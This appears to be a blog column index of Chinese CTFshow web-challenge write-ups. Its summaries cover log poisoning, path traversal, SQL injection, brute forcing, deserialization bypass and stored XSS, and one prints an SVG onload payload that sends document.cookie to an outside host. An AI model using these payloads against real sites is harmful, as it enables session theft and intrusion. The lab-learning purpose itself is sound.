CTFSHOW
文章平均质量分 72
hhhhde_
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
CTFSHOW web入门 黑盒测试 web385-web388
本文总结了CTF题目中常见的几种Web漏洞利用方法:1. 通过删除安装锁文件lock.dat重置管理员密码;2. 利用路径穿越漏洞读取敏感文件;3. 通过日志文件注入PHP代码获取flag。关键技巧包括:分析安装流程、目录扫描发现敏感路径、利用文件包含漏洞读取日志文件、通过User-Agent注入恶意代码等。这些方法展示了如何绕过安全限制获取系统权限,最终读取flag文件内容。原创 2026-05-19 10:22:14 · 78 阅读 · 0 评论 -
CTFSHOW web入门 黑盒测试 web380-web384
本文摘要:通过CTF题目实战,展示了Web安全中的目录扫描、文件包含、SQL注入和密码爆破等技术。在web380-384系列题目中,利用dirsearch扫描目录发现关键文件,通过参数注入获取flag;在web381-383中,通过源代码分析找到隐藏路径,使用弱口令或SQL注入绕过登录;web384则结合题目提示编写脚本生成密码字典进行爆破。这些案例演示了常见Web漏洞的利用方法,包括信息收集、代码审计和自动化攻击等渗透测试技巧。原创 2026-05-17 21:01:51 · 504 阅读 · 0 评论 -
CTFSHOW web入门 XSS web329-web333
摘要:本文记录了5道CTF题目(web329-web333)的解题过程,主要利用存储型XSS漏洞。在web329中,通过XSS注入获取管理员cookie失败后,改用JavaScript动态创建表单提交整个页面源码,最终获取flag。web330和331通过XSS结合CSRF漏洞修改管理员密码。web332和333则利用XSS构造AJAX请求,向指定账户转账后购买flag。每道题目都详细展示了payload构造思路和关键代码实现,最终成功获取flag。原创 2026-05-17 21:00:17 · 360 阅读 · 0 评论 -
CTFSHOW web入门 XSS web327-web328
本文总结了web327和web328两道CTF题目的解题思路。web327考察存储型XSS漏洞利用,通过构造SVG标签的onload事件,将document.cookie外带到攻击者服务器获取flag。web328则需要通过注册页面的XSS注入窃取管理员cookie,再修改请求中的PHPSESSID实现权限提升。两道题目分别演示了存储型XSS攻击和会话劫持的实际应用,最终获取flag原创 2026-05-06 14:59:17 · 233 阅读 · 0 评论 -
CTFSHOW web入门 XSS web316-web326
本文详细记录了从web316到web326的XSS漏洞利用过程,通过多种注入方式(如script标签、HTML事件、SVG标签等)绕过过滤机制,成功窃取Cookie并获取flag。关键步骤包括:使用webhook.site和interactsh平台接收数据,构造payload如<svg onload='new Image().src="URL"+document.cookie'>实现隐蔽数据外带。最终通过URL解码获取各题的flag,例如ctfshow{7d81283a-8add-4967-b442-d5b原创 2026-05-06 14:57:04 · 737 阅读 · 0 评论 -
CTFSHOW web入门 反序列化 web256
本文展示了一个PHP反序列化漏洞利用案例。代码定义了一个ctfShowUser类,通过控制isVip属性可获取flag。攻击者构造恶意序列化对象:设置username='admin'、password='password'和isVip=true,通过Cookie传递该对象。当满足登录验证且isVip为true时,系统会输出flag。关键点在于绕过身份验证和VIP检查,最终成功获取flag:ctfshow{0a328664-3455-4a8f-865b-473c4fb136a8}。该案例演示了PHP反序列化漏原创 2026-04-07 21:23:38 · 50 阅读 · 0 评论 -
CTFSHOW web入门 反序列化 web254-255
摘要:两段PHP代码审计题目展示了不同方式的漏洞利用。第一题(web254)通过直接传参匹配预定义的用户名密码即可获取flag。第二题(web255)引入了反序列化漏洞,通过构造恶意序列化对象并设置isVip为true,利用Cookie传参实现权限绕过。两题对比展示了从简单参数验证到反序列化漏洞的进阶利用,核心考点包括PHP代码审计、反序列化漏洞、客户端可控Cookie及对象属性伪造等安全知识。原创 2026-04-02 21:05:46 · 216 阅读 · 0 评论 -
CTFshow Web 应用安全与防护 | Base64编码隐藏、HTTP头注入、Base64多层嵌套解码
摘要:本文介绍了三个CTF题目解法。1) Base64编码隐藏:在源码中找到Base64编码并解码获得flag;2) HTTP头注入:通过修改User-Agent请求头获取flag;3) Base64多层嵌套:分析JavaScript加密逻辑,编写脚本爆破密码后结合User-Agent修改获取flag。三个题目分别考察了信息收集、HTTP注入和代码审计能力,展示了从简单编码到复杂嵌套加密的解题过程。原创 2026-03-27 20:42:35 · 227 阅读 · 0 评论 -
CTFSHOW web入门 爆破 web23
本文分析了一个PHP代码审计题目,通过GET请求传递token参数获取flag。解题关键点在于:要求token的MD5哈希值第2、15、18位字符相同且为1-9数字满足公式(x+x+x)/x=3,即第32位必须是3使用Python脚本爆破,发现token=422时满足条件最终获取flag:ctfshow{e67404be-9c37-4537-9f36-580ffdbe0a5e}原创 2026-03-26 21:29:45 · 24 阅读 · 0 评论 -
CTFSHOW WEB入门 爆破 web21
本文介绍了通过Burp Suite工具对网页登录进行爆破攻击的过程。首先抓取到使用Base64编码的认证信息"YWRtaW46YWRtaW4xMjM=",解码后为"admin:admin123"。在Intruder模块采用狙击手模式,将认证信息分为三部分处理:用户名、冒号和密码字典。对payload进行Base64编码并取消URL编码后实施爆破,最终成功获取正确密码"shark63",完成CTF挑战。整个过程中重点分析了认证信息的结构处理、payload设置和编码规则调整等关键步骤。原创 2026-03-16 21:26:18 · 245 阅读 · 0 评论 -
CTFshow web入门 web12-20
本文总结了多个CTF web题目的解题思路,主要涉及信息搜集和漏洞利用。常见方法包括:1)使用dirsearch进行目录扫描寻找敏感文件(如/admin、/backup.sql、/db.mdb);2)查看网页源代码寻找隐藏信息;3)利用默认或弱密码登录后台;4)通过探针文件(如tz.php)获取服务器信息;5)分析游戏源码或解密AES获取凭证。关键知识点包括HTTP状态码含义、常见文件类型(如.mdb数据库文件)和PHP探针功能。解题核心在于系统性地收集信息并验证各种可能性,如默认路径、常见漏洞和提示线索。原创 2026-03-13 21:10:56 · 1170 阅读 · 0 评论 -
CTFshow web入门 web1-10
本文总结了10个CTF Web题目解题方法,涉及多种信息泄露技术。主要包括:查看页面源代码获取flag(web1-2)、HTTP抓包分析响应头(web3)、robots.txt协议泄露(web4)、phps源码泄露(web5)、压缩包泄露(web6)、.git/.svn版本控制泄露(web7-8)、vim缓存文件泄露(web9)以及cookie分析(web10)。通过这些案例展示了常见的信息泄露漏洞,包括开发注释未删除、JS拦截绕过、服务器配置不当、备份文件泄露等安全风险,并介绍了相关工具如dirsearc原创 2026-03-12 20:38:39 · 449 阅读 · 0 评论
分享